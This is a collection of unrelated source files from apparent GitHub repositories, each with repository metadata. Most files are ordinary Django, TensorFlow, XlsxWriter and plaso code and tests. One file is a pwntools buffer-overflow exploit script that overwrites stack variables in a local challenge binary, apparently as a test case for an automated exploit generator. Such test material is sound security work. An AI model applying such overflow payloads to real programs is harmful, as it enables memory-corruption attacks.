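# noise, e.g. remove_false_data(np.array([0.5, 2.5, 3.1])) -> array([2.5, 3.1]).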
|
[
"[email protected]"
] | |
13c31e9d950cf3be9f2b388eecebe51ef72bd351
|
b1c7a768f38e2e987a112da6170f49503b9db05f
|
/stockkeeping/migrations/0010_auto_20181101_1545.py
|
34ef7c9e3a98255c3676811073ad0d7d44aad3d4
|
[] |
no_license
|
Niladrykar/bracketerp
|
8b7491aa319f60ec3dcb5077258d75b0394db374
|
ca4ee60c2254c6c132a38ce52410059cc6b19cae
|
refs/heads/master
| 2022-12-11T04:23:07.504966 | 2019-03-18T06:58:13 | 2019-03-18T06:58:13 | 176,218,029 | 1 | 0 | null | 2022-12-08T03:01:46 | 2019-03-18T06:27:37 |
JavaScript
|
UTF-8
|
Python
| false | false | 417 |
py
|
# Generated by Django 2.0.6 on 2018-11-01 10:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('stockkeeping', '0009_auto_20181101_1544'),
]
operations = [
migrations.AlterField(
model_name='purchase_total',
name='Total',
field=models.PositiveIntegerField(blank=True, null=True),
),
]
|
[
"[email protected]"
] | |
78dc4511525e97dd533b1940967724911ec49d65
|
e71fa62123b2b8f7c1a22acb1babeb6631a4549b
|
/xlsxwriter/test/table/test_table07.py
|
121beef77b97ead58a919c1640b8c21d77b0c360
|
[
"BSD-2-Clause"
] |
permissive
|
timgates42/XlsxWriter
|
40480b6b834f28c4a7b6fc490657e558b0a466e5
|
7ad2541c5f12b70be471b447ab709c451618ab59
|
refs/heads/main
| 2023-03-16T14:31:08.915121 | 2022-07-13T23:43:45 | 2022-07-13T23:43:45 | 242,121,381 | 0 | 0 |
NOASSERTION
| 2020-02-21T11:14:55 | 2020-02-21T11:14:55 | null |
UTF-8
|
Python
| false | false | 2,017 |
py
|
###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2022, John McNamara, [email protected]
#
import unittest
from io import StringIO
from ..helperfunctions import _xml_to_list
from ...table import Table
from ...worksheet import Worksheet
from ...workbook import WorksheetMeta
from ...sharedstrings import SharedStringTable
class TestAssembleTable(unittest.TestCase):
"""
Test assembling a complete Table file.
"""
def test_assemble_xml_file(self):
"""Test writing a table"""
self.maxDiff = None
worksheet = Worksheet()
worksheet.worksheet_meta = WorksheetMeta()
worksheet.str_table = SharedStringTable()
# Set the table properties.
worksheet.add_table('C3:F14', {'total_row': 1})
worksheet._prepare_tables(1, {})
fh = StringIO()
table = Table()
table._set_filehandle(fh)
table._set_properties(worksheet.tables[0])
table._assemble_xml_file()
exp = _xml_to_list("""
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="1" name="Table1" displayName="Table1" ref="C3:F14" totalsRowCount="1">
<autoFilter ref="C3:F13"/>
<tableColumns count="4">
<tableColumn id="1" name="Column1"/>
<tableColumn id="2" name="Column2"/>
<tableColumn id="3" name="Column3"/>
<tableColumn id="4" name="Column4"/>
</tableColumns>
<tableStyleInfo name="TableStyleMedium9" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
</table>
""")
got = _xml_to_list(fh.getvalue())
self.assertEqual(got, exp)
|
[
"[email protected]"
] | |
eadf86477e07dc6fcb83e07e480e090199897cee
|
e43e8bd052a613f158e29339aaa7e3bdec40b6fb
|
/models/faster_rcnn_inception_resnet_v2_keras_feature_extractor_test.py
|
a3c33c28e62db57565d0119cf742f97bb5d8df3d
|
[] |
no_license
|
sakshijain032/Harmful-Object-Detection
|
249f586ffbc7de99f6647689bae230f3b79694b3
|
8e1711fc1596b451f97b5ff2f7690453a888c848
|
refs/heads/master
| 2022-12-24T18:40:41.795010 | 2020-10-01T17:34:42 | 2020-10-01T17:34:42 | 293,727,797 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,612 |
py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for models.faster_rcnn_inception_resnet_v2_keras_feature_extractor."""
import tensorflow as tf
from models import faster_rcnn_inception_resnet_v2_keras_feature_extractor as frcnn_inc_res
class FasterRcnnInceptionResnetV2KerasFeatureExtractorTest(tf.test.TestCase):
def _build_feature_extractor(self, first_stage_features_stride):
return frcnn_inc_res.FasterRCNNInceptionResnetV2KerasFeatureExtractor(
is_training=False,
first_stage_features_stride=first_stage_features_stride,
batch_norm_trainable=False,
weight_decay=0.0)
def test_extract_proposal_features_returns_expected_size(self):
feature_extractor = self._build_feature_extractor(
first_stage_features_stride=16)
preprocessed_inputs = tf.random_uniform(
[1, 299, 299, 3], maxval=255, dtype=tf.float32)
rpn_feature_map = feature_extractor.get_proposal_feature_extractor_model(
name='TestScope')(preprocessed_inputs)
features_shape = tf.shape(rpn_feature_map)
init_op = tf.global_variables_initializer()
with self.test_session() as sess:
sess.run(init_op)
features_shape_out = sess.run(features_shape)
self.assertAllEqual(features_shape_out, [1, 19, 19, 1088])
def test_extract_proposal_features_stride_eight(self):
feature_extractor = self._build_feature_extractor(
first_stage_features_stride=8)
preprocessed_inputs = tf.random_uniform(
[1, 224, 224, 3], maxval=255, dtype=tf.float32)
rpn_feature_map = feature_extractor.get_proposal_feature_extractor_model(
name='TestScope')(preprocessed_inputs)
features_shape = tf.shape(rpn_feature_map)
init_op = tf.global_variables_initializer()
with self.test_session() as sess:
sess.run(init_op)
features_shape_out = sess.run(features_shape)
self.assertAllEqual(features_shape_out, [1, 28, 28, 1088])
def test_extract_proposal_features_half_size_input(self):
feature_extractor = self._build_feature_extractor(
first_stage_features_stride=16)
preprocessed_inputs = tf.random_uniform(
[1, 112, 112, 3], maxval=255, dtype=tf.float32)
rpn_feature_map = feature_extractor.get_proposal_feature_extractor_model(
name='TestScope')(preprocessed_inputs)
features_shape = tf.shape(rpn_feature_map)
init_op = tf.global_variables_initializer()
with self.test_session() as sess:
sess.run(init_op)
features_shape_out = sess.run(features_shape)
self.assertAllEqual(features_shape_out, [1, 7, 7, 1088])
def test_extract_proposal_features_dies_on_invalid_stride(self):
with self.assertRaises(ValueError):
self._build_feature_extractor(first_stage_features_stride=99)
def test_extract_proposal_features_dies_with_incorrect_rank_inputs(self):
feature_extractor = self._build_feature_extractor(
first_stage_features_stride=16)
preprocessed_inputs = tf.random_uniform(
[224, 224, 3], maxval=255, dtype=tf.float32)
with self.assertRaises(ValueError):
feature_extractor.get_proposal_feature_extractor_model(
name='TestScope')(preprocessed_inputs)
def test_extract_box_classifier_features_returns_expected_size(self):
feature_extractor = self._build_feature_extractor(
first_stage_features_stride=16)
proposal_feature_maps = tf.random_uniform(
[2, 17, 17, 1088], maxval=255, dtype=tf.float32)
model = feature_extractor.get_box_classifier_feature_extractor_model(
name='TestScope')
proposal_classifier_features = (
model(proposal_feature_maps))
features_shape = tf.shape(proposal_classifier_features)
init_op = tf.global_variables_initializer()
with self.test_session() as sess:
sess.run(init_op)
features_shape_out = sess.run(features_shape)
self.assertAllEqual(features_shape_out, [2, 8, 8, 1536])
if __name__ == '__main__':
tf.test.main()
|
[
"[email protected]"
] | |
d0a334ca6c19f583a7c9f4aa5a63c23ce53c9460
|
077a17b286bdd6c427c325f196eb6e16b30c257e
|
/00_BofVar-unit-tests/07_64/remenissions-work/exploit-BofVar-1.py
|
3e5efa3d0d010a0028daecc2f04b08bca5fc6cab
|
[] |
no_license
|
KurSh/remenissions_test
|
626daf6e923459b44b82521aa4cb944aad0dbced
|
9dec8085b62a446f7562adfeccf70f8bfcdbb738
|
refs/heads/master
| 2023-07-08T20:25:04.823318 | 2020-10-05T06:45:16 | 2020-10-05T06:45:16 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 776 |
py
|
from pwn import *
import time
import sys
import os  # used by check_verification_done below
import signal
import sf
target = process("./chall-test_BofVar-07-x64")
gdb.attach(target, execute="verify_exploit")
bof_payload = sf.BufferOverflow(arch=64)
bof_payload.set_input_start(0x48)
bof_payload.add_int32(0x14, 0xdead)
bof_payload.add_int32(0x10, 0xdeae)
bof_payload.add_int32(0xc, 0xdeae)
payload = bof_payload.generate_payload()
target.sendline(payload)
# Exploit Verification starts here 15935728
def handler(signum, frame):
raise Exception("Timed out")
def check_verification_done():
while True:
if os.path.exists("pwned") or os.path.exists("rip"):
sys.exit(0)
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
try:
while True:
check_verification_done()
except Exception:
print("Exploit timed out")
|
[
"[email protected]"
] | |
3b3394be7b0f7c6c13b2006438556a5f0c7303ff
|
7848e1b778ca0f3921aeeb0aeee44b398711b1f0
|
/funtesting/mock/__init__.py
|
495f052105769c8dfec9019cc49217d5fe565c55
|
[] |
no_license
|
fatelei/funtesting
|
a3a292ddfa30d9fbad47ee293768558b9e45fe8d
|
748f4b5767cc16929408b19a5b62a812b48a0dd5
|
refs/heads/master
| 2021-01-10T12:09:38.809451 | 2016-02-21T03:59:15 | 2016-02-21T03:59:15 | 51,986,949 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 158 |
py
|
# -*- coding: utf8 -*-
"""
funtesting.mock
~~~~~~~~~~~~~~~
Mock modules.
"""
from .mock_redis import mock_redis
__all__ = [
"mock_redis"
]
|
[
"[email protected]"
] | |
22c9b2072eee710b0af8c948145defea4346aa03
|
4aa7a4d0525095725eb99843c83827ba4806ceb1
|
/keras/keras110_5_LeakyReLU.py
|
213ecbe46b4073d61f4b984af0b9f92698fdaafd
|
[] |
no_license
|
seonukim/Study
|
65a70f5bdfad68f643abc3086d5c7484bb2439d4
|
a5f2538f9ae8b5fc93b5149dd51704e8881f0a80
|
refs/heads/master
| 2022-12-04T17:04:31.489771 | 2020-08-21T00:35:15 | 2020-08-21T00:35:15 | 260,144,755 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 283 |
py
|
# activation - LeakyReLU
import numpy as np
import matplotlib.pyplot as plt
x = np.arange(-6, 6, 0.01)
def leakyrelu(x): # Leaky ReLU(Rectified Linear Unit)
    return np.maximum(0.1 * x, x) # slope 0.1 for x < 0, identity for x >= 0
plt.plot(x, leakyrelu(x), linestyle = '--', label = 'Leaky ReLU')
plt.show()
|
[
"[email protected]"
] | |
8e0ed00e073de8a5bccb6b2d7fe1eef2ede522de
|
9e4df2b26e899f2d3e044e71bc4193958b02314b
|
/app/migrations/0027_auto_20200930_0118.py
|
bb05747fde99e2ecc6d9acb7db6fe524b26b1a36
|
[
"MIT"
] |
permissive
|
hosseinmoghimi/phoenix
|
afea0a73cdf257fcf89c75d85c5ab1890d957a83
|
43fc49421a50563acc1884981d391b0d6a5d5d72
|
refs/heads/master
| 2023-01-11T11:12:30.308822 | 2020-11-15T13:52:21 | 2020-11-15T13:52:21 | 295,109,751 | 1 | 5 |
MIT
| 2020-11-15T13:50:12 | 2020-09-13T08:31:01 |
HTML
|
UTF-8
|
Python
| false | false | 701 |
py
|
# Generated by Django 3.1 on 2020-09-29 21:48
from django.db import migrations
import tinymce.models
class Migration(migrations.Migration):
dependencies = [
('app', '0026_auto_20200930_0117'),
]
operations = [
migrations.AlterField(
model_name='jumbotron',
name='description',
field=tinymce.models.HTMLField(blank=True, max_length=2000, null=True, verbose_name='شرح کامل'),
),
migrations.AlterField(
model_name='jumbotron',
name='short_description',
field=tinymce.models.HTMLField(blank=True, max_length=1000, null=True, verbose_name='شرح کوتاه'),
),
]
|
[
"[email protected]"
] | |
0180991f5de6838806543f0af00e4bb397839b33
|
ef42fa903820055b9b0a8b4ebb1863a16d386171
|
/contact/forms.py
|
ee057df7c2a82d279ab2da12b60a6da4f9beac72
|
[] |
no_license
|
sinjorjob/django-simple-capture-inquery-form
|
2537c8e03bc2c0118f772b69a59866ffb34d7cac
|
8bd2900a6bdf97b97ddca7b7240b42f478e14884
|
refs/heads/master
| 2023-07-02T14:40:43.840669 | 2021-08-10T21:24:24 | 2021-08-10T21:24:24 | 394,784,208 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,570 |
py
|
from django import forms
from captcha.fields import CaptchaField, CaptchaTextInput
from django.core.mail import send_mail # added
from config import settings # added
from django.urls import reverse # added
import smtplib # added
class ContactForm(forms.Form):
name = forms.CharField(label="氏名")
email = forms.EmailField(label="連絡先アドレス")
subject = forms.CharField(label="タイトル")
message = forms.CharField(label="お問い合わせ内容",
widget=forms.Textarea(attrs={'rows':4, 'cols':40}))
captcha = CaptchaField(widget=CaptchaTextInput(attrs={'placeholder':'上記のアルファベットを入力してください。'}))
    # everything below this line was added
def send_email(self):
subject = '[Inquiry Form] from %s' % settings.SITE_URL + reverse('contact_form')
name = self.cleaned_data['name']
email = self.cleaned_data['email']
message = self.cleaned_data['message']
body = """
氏名: %s
メールアドレス: %s
問い合わせ内容: %s
""" %(name, email, message)
        sender = email
        receipient = settings.EMAIL_HOST_USER
        response = None  # avoid a NameError on return if send_mail raises
        try:
            response = send_mail(
                subject, # subject line
                body, # message body
                sender, # sender
                [receipient], # recipient
                fail_silently=False,
            )
        except smtplib.SMTPException:
            pass
        return response
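        # Note: Django's send_mail returns the number of messages successfully
        # delivered (0 or 1 here); response stays None if SMTP raised.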
|
[
"[email protected]"
] | |
626ccb2e51e4602bed82ff9ee6f72b36dc9f0add
|
0e647273cffc1fb6cbd589fa3c7c277b221ba247
|
/configs/hpt-pretrain/bdd/byol_r50_bs2048_accmulate2_ep200/500-iters.py
|
215d809fb24ebc2a34d497fc2f4750a359313eda
|
[
"Apache-2.0"
] |
permissive
|
Berkeley-Data/OpenSelfSup
|
e9976bf011b69ebf918506ba184f464b1073ec13
|
221191b88d891de57725b149caf237ffef72e529
|
refs/heads/master
| 2023-05-12T07:34:52.268476 | 2021-04-08T00:58:37 | 2021-04-08T00:58:37 | 343,654,823 | 0 | 1 |
Apache-2.0
| 2021-04-08T00:58:37 | 2021-03-02T05:20:27 |
Python
|
UTF-8
|
Python
| false | false | 237 |
py
|
_base_="../byol-base-bdd-config.py"
# this will merge with the parent
model=dict(pretrained='data/basetrain_chkpts/byol_r50_bs2048_accmulate2_ep200.pth')
# epoch related
total_iters=500*2
checkpoint_config = dict(interval=total_iters)
|
[
"[email protected]"
] | |
5898c1034a4038ecddbfd07e7567ec2b0facdbee
|
03c9bb7e3cc687afecd57c6c6e3d5c1d54ed7ab0
|
/smilejakdu/3week/3day/MaximumSubarray.py
|
745fb6d684c6125416fb3fa0eafd62e8a9348e99
|
[] |
no_license
|
smilejakdu/python_algorithm_study
|
541aa3de77e9f432d41b5627790a6f3e10f5a07d
|
5119b31b6ae781e12bf97134ca6f10fec662abd8
|
refs/heads/master
| 2023-04-06T15:41:41.156021 | 2020-08-10T08:58:34 | 2020-08-10T08:58:34 | 282,879,639 | 0 | 0 | null | 2020-08-01T07:04:38 | 2020-07-27T11:36:31 |
Python
|
UTF-8
|
Python
| false | false | 897 |
py
|
''':arg
Given an integer array nums, find the contiguous subarray (containing at least one number) which has the largest sum and return its sum.
Input: [-2,1,-3,4,-1,2,1,-5,4],
Output: 6
Explanation: [4,-1,2,1] has the largest sum = 6.
'''
nums = [-2, 1, -3, 4, -1, 2, 1, -5, 4]
''':arg
maxcurr = nums[0]
maxglobal = nums[0]
First, seed both variables with the value at index 0.
Run the loop starting from index 1.
Use max() to compare nums[i] with maxcurr + nums[i].
Store the larger value back into maxcurr.
Then compare maxcurr with maxglobal and keep the larger.
'''
def maxSubArray(nums):
maxcurr = nums[0]
maxglobal = nums[0]
for i in range(1, len(nums)):
maxcurr = max(nums[i], maxcurr + nums[i])
maxglobal = max(maxcurr, maxglobal)
return maxglobal
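# Worked trace on the sample input: maxcurr climbs to 6 on the slice [4, -1, 2, 1],
# so maxSubArray(nums) prints 6, matching the expected output above.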
print(maxSubArray(nums))
|
[
"[email protected]"
] | |
62be29a83225382074ef88884da70792ec0067e6
|
00ce0f4d0c380d60cb336484200153636b249120
|
/tests/agents/trade/test_case_mixin.py
|
271f41ecbbe4a1c7723057a2e8fabc60c2e0e0c9
|
[
"MIT"
] |
permissive
|
tezheng/hearthbreaker
|
21784aeba11f557703e22a23af54886c496d3fec
|
169ad0d00e62300054e7cbaf5562d750f28730a8
|
refs/heads/master
| 2021-01-15T14:30:05.542012 | 2014-09-24T20:03:12 | 2014-09-24T20:03:12 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,925 |
py
|
import random
from tests.agents.trade.test_helpers import TestHelpers
from hearthbreaker.agents.trade.trade import Trades
class TestCaseMixin:
def setUp(self):
TestHelpers.fix_create_minion()
random.seed(1857)
def add_minions(self, game, player_index, *minions):
player = game.players[player_index]
for minion in minions:
minion.use(player, game)
def make_all_active(self, game):
for player in game.players:
for minion in player.minions:
minion.active = True
minion.exhausted = False
def assert_minions(self, player, *names):
actual = self.card_names(player.minions)
self.assertEqual(sorted(actual), sorted(names))
def card_names(self, cards):
return [m.try_name() for m in cards]
def player_str(self, player):
res = []
res.append("\nPlayer\n")
res.append("Hand: ")
res.append(self.card_names(player.hand))
res.append("\nDeck: ")
res.append(self.card_names(player.deck.cards[0:5]))
res.append("\n")
res = [str(x) for x in res]
return str.join("", res)
def make_trades2(self, me, opp, game_callback=None):
me = [m for m in map(lambda c: c.create_minion(None), me)]
opp = [m for m in map(lambda c: c.create_minion(None), opp)]
game = self.make_game()
if game_callback:
game_callback(game)
trades = Trades(game.players[0], me, opp, game.players[1].hero)
return [game, trades]
def make_trades(self, me, opp):
return self.make_trades2(me, opp)[1]
def make_cards(self, *cards):
return [c for c in cards]
def make_game(self):
return TestHelpers().make_game()
def set_hand(self, game, player_index, *cards):
cards = self.make_cards(*cards)
game.players[player_index].hand = cards
|
[
"[email protected]"
] | |
87d413d7af90828f2782af0f4e847016caecc553
|
b403c7fe56209472855dff451f0b6283d5471008
|
/Supplemental_Material/PythonProjects/myFunctions/isItOdd.py
|
14037a63dbb500f808f9316903acca319e7bc678
|
[] |
no_license
|
Sandbox4KidsTM/Python_Basics
|
842bde52796896e913fdb5cc349034c52092555f
|
68c95547ec1567958fc8069e6a4bb119e436211a
|
refs/heads/master
| 2020-03-23T01:06:29.363196 | 2018-08-10T04:32:58 | 2018-08-10T04:32:58 | 140,901,128 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 173 |
py
|
# checks if a user-entered number is odd
a = int(input("enter a num: "))
if a % 2 == 0:  # % is the modulus (remainder) operator
print("number is EVEN")
else:
print("number is ODDDDD")
|
[
"[email protected]"
] | |
89e353022fef9fffa9f5835f74ae7501b8c1d990
|
3960fa9721ff97c8da99d010e27118ab0bc1201d
|
/tests/storage/fake_storage.py
|
c1437e781c494d82c715effbb93b4b9fafedaf40
|
[
"Apache-2.0"
] |
permissive
|
iamjoshbinder/plaso
|
d3ebbc216b4d89c8f8f6ab50f059b6db7bcca599
|
762aa1d1eb17760ef5e2708a48dff2acad7001ea
|
refs/heads/master
| 2021-08-08T13:23:10.146862 | 2017-11-09T10:44:09 | 2017-11-09T10:44:09 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,362 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the fake storage."""
import unittest
from plaso.containers import errors
from plaso.containers import event_sources
from plaso.containers import reports
from plaso.containers import sessions
from plaso.containers import tasks
from plaso.lib import definitions
from plaso.storage import fake_storage
from tests.storage import test_lib
class FakeStorageWriterTest(test_lib.StorageTestCase):
"""Tests for the fake storage writer object."""
def testAddAnalysisReport(self):
"""Tests the AddAnalysisReport function."""
session = sessions.Session()
analysis_report = reports.AnalysisReport(
plugin_name=u'test', text=u'test report')
storage_writer = fake_storage.FakeStorageWriter(session)
storage_writer.Open()
storage_writer.AddAnalysisReport(analysis_report)
storage_writer.Close()
with self.assertRaises(IOError):
storage_writer.AddAnalysisReport(analysis_report)
def testAddError(self):
"""Tests the AddError function."""
session = sessions.Session()
extraction_error = errors.ExtractionError(
message=u'Test extraction error')
storage_writer = fake_storage.FakeStorageWriter(session)
storage_writer.Open()
storage_writer.AddError(extraction_error)
storage_writer.Close()
with self.assertRaises(IOError):
storage_writer.AddError(extraction_error)
def testAddEvent(self):
"""Tests the AddEvent function."""
session = sessions.Session()
test_events = self._CreateTestEvents()
storage_writer = fake_storage.FakeStorageWriter(session)
storage_writer.Open()
event = None
for event in test_events:
storage_writer.AddEvent(event)
storage_writer.Close()
with self.assertRaises(IOError):
storage_writer.AddEvent(event)
def testAddEventSource(self):
"""Tests the AddEventSource function."""
session = sessions.Session()
event_source = event_sources.EventSource()
storage_writer = fake_storage.FakeStorageWriter(session)
storage_writer.Open()
storage_writer.AddEventSource(event_source)
storage_writer.Close()
with self.assertRaises(IOError):
storage_writer.AddEventSource(event_source)
def testAddEventTag(self):
"""Tests the AddEventTag function."""
session = sessions.Session()
storage_writer = fake_storage.FakeStorageWriter(session)
storage_writer.Open()
test_events = self._CreateTestEvents()
for event in test_events:
storage_writer.AddEvent(event)
event_tag = None
test_event_tags = self._CreateTestEventTags(test_events)
for event_tag in test_event_tags:
storage_writer.AddEventTag(event_tag)
storage_writer.Close()
with self.assertRaises(IOError):
storage_writer.AddEventTag(event_tag)
def testOpenClose(self):
"""Tests the Open and Close functions."""
session = sessions.Session()
storage_writer = fake_storage.FakeStorageWriter(session)
storage_writer.Open()
storage_writer.Close()
storage_writer.Open()
storage_writer.Close()
storage_writer = fake_storage.FakeStorageWriter(
session, storage_type=definitions.STORAGE_TYPE_TASK)
storage_writer.Open()
storage_writer.Close()
storage_writer.Open()
with self.assertRaises(IOError):
storage_writer.Open()
storage_writer.Close()
with self.assertRaises(IOError):
storage_writer.Close()
def testGetEvents(self):
"""Tests the GetEvents function."""
session = sessions.Session()
test_events = self._CreateTestEvents()
storage_writer = fake_storage.FakeStorageWriter(session)
storage_writer.Open()
event = None
for event in test_events:
storage_writer.AddEvent(event)
events = list(storage_writer.GetEvents())
self.assertEqual(len(events), len(test_events))
storage_writer.Close()
# TODO: add tests for GetEventSources.
# TODO: add tests for GetEventTags.
# TODO: add tests for GetFirstWrittenEventSource and
# GetNextWrittenEventSource.
def testGetSortedEvents(self):
"""Tests the GetSortedEvents function."""
session = sessions.Session()
test_events = self._CreateTestEvents()
storage_writer = fake_storage.FakeStorageWriter(session)
storage_writer.Open()
event = None
for event in test_events:
storage_writer.AddEvent(event)
events = list(storage_writer.GetSortedEvents())
self.assertEqual(len(events), len(test_events))
storage_writer.Close()
# TODO: add test with time range.
def testWriteSessionStartAndCompletion(self):
"""Tests the WriteSessionStart and WriteSessionCompletion functions."""
session = sessions.Session()
storage_writer = fake_storage.FakeStorageWriter(session)
storage_writer.Open()
storage_writer.WriteSessionStart()
storage_writer.WriteSessionCompletion()
storage_writer.Close()
with self.assertRaises(IOError):
storage_writer.WriteSessionStart()
with self.assertRaises(IOError):
storage_writer.WriteSessionCompletion()
storage_writer = fake_storage.FakeStorageWriter(
session, storage_type=definitions.STORAGE_TYPE_TASK)
storage_writer.Open()
with self.assertRaises(IOError):
storage_writer.WriteSessionStart()
with self.assertRaises(IOError):
storage_writer.WriteSessionCompletion()
storage_writer.Close()
def testWriteTaskStartAndCompletion(self):
"""Tests the WriteTaskStart and WriteTaskCompletion functions."""
session = sessions.Session()
task = tasks.Task(session_identifier=session.identifier)
storage_writer = fake_storage.FakeStorageWriter(
session, storage_type=definitions.STORAGE_TYPE_TASK, task=task)
storage_writer.Open()
storage_writer.WriteTaskStart()
storage_writer.WriteTaskCompletion()
storage_writer.Close()
with self.assertRaises(IOError):
storage_writer.WriteTaskStart()
with self.assertRaises(IOError):
storage_writer.WriteTaskCompletion()
storage_writer = fake_storage.FakeStorageWriter(session)
storage_writer.Open()
with self.assertRaises(IOError):
storage_writer.WriteTaskStart()
with self.assertRaises(IOError):
storage_writer.WriteTaskCompletion()
storage_writer.Close()
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
f18208cbe2c56461d40b39d71cffbfaf1b0fee2b
|
6af6a6fb7d0759be524f2592a470d91947e0e2bc
|
/RandomForest/src/dataset/sp_010_1e2.py
|
699dc20994db4aa94c5f33202f7ef75e147f7653
|
[] |
no_license
|
wasit7/ImageSearch
|
5094e56db46af0d05cf76e5b5110c5b92d5198fd
|
3cd7ab3fa3c89873c0b49b1311ed5e7c5f4b8939
|
refs/heads/master
| 2020-05-17T01:12:24.616821 | 2015-08-10T07:26:44 | 2015-08-10T07:26:44 | 22,672,379 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,887 |
py
|
"""
Contains a class that provides a spiral dataset to a random forest.
@author: Krerkkiat
updated by Wasit
"""
import numpy as np
class SpiralDataset:
'''
Provide Spiral Dataset to Random Forest
'''
def __init__(self, clmax, spc):
'''
Initial routine.
Parameter(s):
clmax: int - Maximum number of class.
spc: int - Size of data per class per client.
'''
self.clmax = clmax # class max of dataset
self.spc = spc # q size per class per client
self.dimension = 2 # it is axis x and y
self.I = np.zeros([self.dimension, 0], dtype=np.float) # np.ndarray row vetor, hold features
self.L = np.array([], dtype=np.int) # np.array, hold label
# create I
for x in range(self.clmax):
theta = np.linspace(0, 2*np.pi, self.spc)+np.random.randn(self.spc)*0.4*np.pi/clmax + 2*np.pi*x/clmax
r = np.linspace(0.1, 1, self.spc)
self.I = np.append(self.I, [r*np.cos(theta), r*np.sin(theta)], axis=1)
            self.L = np.append(self.L, np.ones(self.spc, dtype=np.int)*x)  # plain 1-D append; axis=1 raises on 1-D arrays in current numpy
def getL(self, x):
'''
        Lookup database for a label of data at x.
Parameter(s):
x: int or numpy.array - Index or indexes of data that you need to get label.
Return(s):
label: int - Label of data at x.
'''
return self.L[x]
def getI(self, theta, x):
'''
Lookup table by theta for tau (splitting parameter or threshold) at index x.
Parameter(s):
theta: int - theta that will use for lookup.
x: int - Index of data.
Return(s):
tau: float - tau or raw data of data at index x with dimension theta.
'''
return self.I[theta, x]
def getX(self):
'''
        Make a list of indexes used when initializing the root node on the client side.
Return(s):
idx_list: list - List of index of data.
'''
return np.arange(0, self.clmax * self.spc)
def getParam(self, X):
'''
        Randomly choose theta, then look up tau for that theta at each index in X.
        Parameter(s):
            X: list - List of indexes used to get tau.
Return(s):
theta: list - List of randomed theta.
tau: list - List of tau with lookup by theta and x.
'''
theta = np.random.randint(self.dimension, size=len(X))
tau = self.getI(theta, X)
return theta, tau
def __str__(self):
'''
        Nothing special; used for debugging.
Return:
txt: str - String that represent this class.
'''
return 'clmax: {cm}, spc: {ql}'.format(cm=self.clmax, ql=self.spc)
if __name__ == '__main__':
clmax = 10
spc = int(1e2)
dataset = SpiralDataset(clmax, spc)
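    # Sketch of how a client would drive the accessors (illustrative only):
    #   X = dataset.getX()                 # all sample indexes
    #   theta, tau = dataset.getParam(X)   # random split dimensions and thresholds
    #   labels = dataset.getL(X)           # ground-truth class labels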
|
[
"[email protected]"
] |